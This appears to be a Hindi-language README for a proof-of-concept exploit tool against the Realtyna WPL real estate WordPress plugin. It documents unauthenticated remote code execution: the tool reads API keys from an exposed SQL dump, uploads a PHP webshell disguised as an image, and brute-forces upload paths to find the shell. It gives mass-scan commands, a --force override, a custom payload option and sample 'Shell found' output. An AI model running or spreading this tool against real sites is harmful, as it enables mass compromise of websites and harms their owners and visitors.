
CVE-2026-14483 POC EXPLOIT BY MADEXPLOITS
Realtyna WPL रियल एस्टेट लिस्टिंग WordPress प्लगइन के विरुद्ध बिना प्रमाणीकरण के रिमोट कोड निष्पादन।
| फ़ील्ड | विवरण |
|---|---|
| CVE | CVE-2026-14483 |
| प्रभावित संस्करण | <= 5.2.0 |
| प्लगइन | real-estate-listing-realtyna-wpl |
| प्रभाव | बिना प्रमाणीकरण के PHP वेबशेल अपलोड (RCE) |
| स्क्रिप्ट | CVE-2026-14483.py |
| लेखक | MADEXPLOITS |
डिफ़ॉल्ट रूप से स्क्रिप्ट केवल WPL 5.2.0 चलाने वाले लक्ष्यों का शोषण करती है। ओवरराइड करने के लिए
--forceउपयोग करें।
api_key / api_secret एक सार्वजनिक SQL माइग्रेशन डंप के माध्यम से उजागर होते हैं।set_property) को प्रमाणित करते हैं, जिससे एक क्राफ्टेड PHP फ़ाइल को संपत्ति छवि के रूप में अपलोड किया जा सकता है।wp-content/uploads/WPL/{property_id}/ के अंतर्गत स्थित होता है।pip install requests colorama
प्रति पंक्ति एक आधार URL वाली टेक्स्ट फ़ाइल बनाएँ:
http://wplab.test
https://example.com
python CVE-2026-14483.py --targets targets.txt
सफल शेल URL result.txt (या --output) में जोड़े जाते हैं।
python CVE-2026-14483.py \
--targets targets.txt \
--output result.txt \
--user-id 1 \
--max-id 1000 \
--timeout 30 \
--threads 5 \
--debug \
--force
Target URL
│
▼
Detect WPL version (readme.txt / wpl.php)
│ skip unless == 5.2.0 (or --force)
▼
Fetch api_key + api_secret from:
/wp-content/plugins/real-estate-listing-realtyna-wpl/assets/migrations/basic/1.0.0.sql
│
▼
POST set_property via WPL I/O API
(upload image_0x89MADEXPLOITS.php as image/jpeg)
│
▼
Brute-force property ID 1..max-id
/wp-content/uploads/WPL/{id}/0x89MADEXPLOITS.php
│
▼
Write shell URL → output file
डिफ़ॉल्ट शेल मार्कर: MADEXPLOITS
डिफ़ॉल्ट रिमोट फ़ाइलनाम: 0x89MADEXPLOITS.php
एकल लैब लक्ष्य (यह वर्कस्पेस):
echo http://wplab.test > targets.txt
python CVE-2026-14483.py --targets targets.txt --debug
उच्च समवर्तीता के साथ बड़े पैमाने पर स्कैन:
python CVE-2026-14483.py --targets targets.txt --threads 20 --output shells.txt
संस्करण जाँच विफल होने पर शोषण बलपूर्वक करें:
python CVE-2026-14483.py --targets targets.txt --force
[+] Shell found: http://target/wp-content/uploads/WPL/32/0x89MADEXPLOITS.php
[*] Progress: 1/1 | Found: 1
[+] Done. Found 1 shell(s). Check 'result.txt' for URLs.
result.txt में प्रति पंक्ति एक शेल URL होता है।
readme.txt में Stable tag: / Version: से पढ़ा जाता है, जिसमें wpl.php का फ़ॉलबैक होता है।--max-id बढ़ाएँ।| तर्क | डिफ़ॉल्ट | विवरण |
|---|
--targets | (आवश्यक) | आधार URL वाली फ़ाइल (प्रति पंक्ति एक) |
--output | result.txt | मिले शेल URL जोड़ने के लिए फ़ाइल |
--user-id | 1 | WordPress / WPL उपयोगकर्ता ID जो नई संपत्ति का स्वामी है |
--payload | अंतर्निहित अपलोड शेल | कस्टम PHP पेलोड स्ट्रिंग |
--max-id | 1000 | शेल का पता लगाते समय ब्रूट-फोर्स करने के लिए अधिकतम संपत्ति ID |
--timeout | 30 | सेकंड में HTTP टाइमआउट |
--threads | 5 | समवर्ती कार्यकर्ता थ्रेड |
--debug | बंद | विस्तृत डीबग लॉगिंग |
--force | बंद | शोषण करें भले ही संस्करण ≠ 5.2.0 हो या संस्करण का पता न चल सके |